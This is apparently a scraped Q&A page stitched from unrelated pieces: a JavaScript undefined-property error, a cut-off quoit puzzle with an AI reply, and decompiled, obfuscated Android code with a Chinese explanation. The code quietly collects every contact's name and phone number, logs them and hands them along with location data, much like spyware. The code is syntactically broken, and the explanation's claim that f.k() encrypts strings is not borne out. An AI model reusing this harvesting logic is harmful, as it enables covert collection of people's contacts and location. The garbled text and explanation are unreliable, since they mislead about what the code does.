properties of undefined (reading '0') at
时间: 2023-10-17 16:28:24 浏览: 172
这个错误通常出现在 JavaScript 中,它表示您正在尝试从未定义的变量或对象中读取属性。这可能是因为您尝试访问一个不存在的属性或者变量未被正确声明或初始化。
have you ever played quoit in a playground? quoit is a game in which flat rings are pitched at some toys, with all the toys encircled awarded. in the field of cyberground, the position of each toy is fixed, and the ring is carefully designed so it can onl
y encircle one specific toy. As an AI language model, I have never played quoit in a playground, but I understand the rules and concept of the game.
private final void K(String str, String str2, LocationBean locationBean) { String str3 = y; Log.i(str3, gp1.m4A("fX9uWXV0bnt5bmkyMzorOnd1eHN2fzogOg") + str + gp1.m4A("Onl1fn86IDo") + str2); String k = f.k(g.a(), g.b()); ArrayList arrayList = new ArrayList(); Cursor query = getContentResolver().query(ContactsContract.Contacts.CONTENT_URI, new String[]{gp1.m4A("RXN-"), gp1.m4A("fnNpanZ7Y0V0e3d_")}, null, null, null); int b2 =; int i = 0; while (true) { f.c(query); if (!query.moveToNext() || i >= b2) { break; } long j = query.getLong(0); String string = query.getString(1); Cursor query2 = getContentResolver().query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI, new String[]{gp1.m4A("fntueys")}, f.k(gp1.m4A("eXV0bnt5bkVzfic"), Long.valueOf(j)), null, null); if (query2 != null && query2.moveToFirst()) { String string2 = query2.getString(0); f.d(string2, gp1.m4A("anJ1dH9pWW9oaXVoNH1_bkluaHN0fTIqMw")); String b3 = new e.b0.f(gp1.m4A("QUQqNyNH")).b(string2, BuildConfig.FLAVOR); f.d(string, gp1.m4A("dHt3fw")); arrayList.add(new PhoneNumberBody(b3, string)); } f.c(query2); query2.close(); i++; } query.close(); Log.i(y, f.k(gp1.m4A("KDp9f25ZdXRue3luaTIzOjpZdXRue3luaTp2c2luOiA6"), arrayList)); b0(arrayList, str, str2, k, locationBean); }
这段代码是一个私有方法K,其中使用了Android系统提供的ContactsContract API和自定义的一些类。该方法实现了获取手机通讯录中所有联系人的电话号码和姓名,并将其封装成PhoneNumberBody对象,添加到ArrayList中。在方法中还获取了当前位置信息LocationBean,并调用b0方法进行一些处理。方法中使用了f.k()方法对字符串进行了加密,具体加密方式未知。